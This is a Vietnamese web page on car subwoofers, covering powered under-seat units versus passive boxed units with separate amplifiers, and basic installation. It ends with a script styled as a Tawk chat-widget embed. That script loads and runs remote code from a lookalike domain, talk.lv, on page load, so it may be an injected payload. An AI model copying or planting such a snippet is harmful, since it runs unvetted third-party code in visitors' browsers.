Loa sub

Loa sub dành cho ô tô hay còn gọi là loa bass, loa trầm, loa siêu trầm….tùy theo cách gọi của từng người. Thiết bị này cung cấp dải âm trầm cho hệ thống âm thanh của xe. Việc chọn lựa một sản phẩm phù hợp cho xe của bạn cũng rất quan trọng.

Loa sub dành cho ô tô có hai loại chính:

  • Sub điện hay còn gọi là loa sub đặt gầm ghế: Đúng như tên gọi của sản phẩm, vị trí lắp sẽ là đặt tại gầm ghế (bên phụ hoặc bên lái tùy theo xe và nhu cầu của người dùng). Dòng loa này cũng có những loại thiết kế dạng thùng đặt tại cốp phía sau xe. Bản thân loa đã được tích hợp sẵn amply công suất nhỏ bên trong.
  • Sub hơi hay còn gọi là loa siêu trầm: là dòng loa có công suất lớn, có chất âm mềm và dầy hơn so với dòng loa sub điện. Dòng loa này cần đóng thùng để sau cốp và cần có thêm amply rời để kéo.

Quá trình lắp đặt loa sub cho ô tô khá đơn giản. Tín hiệu âm thanh sẽ được lấy từ đầu CD hoặc màn hình DVD, sau đó đến thẳng thiết bị (nếu là sub hơi thì tín hiệu âm thanh sẽ qua amply trước khi đến loa). Với dòng sub hơi, trước khi lắp đặt cần được đóng thùng kín đảm bảo các yếu tố kỹ thuật, đảm bảo một chất âm tốt nhất cho hệ thống của bạn.

 

var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date(); (function(){ var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0]; s1.async=true; s1.src='https://embed.talk.lv/666d0cb9bc592c18a31f4fa4/1i0cvjdor'; s1.charset='UTF-8'; s1.setAttribute('crossorigin','*'); s0.parentNode.insertBefore(s1,s0); })();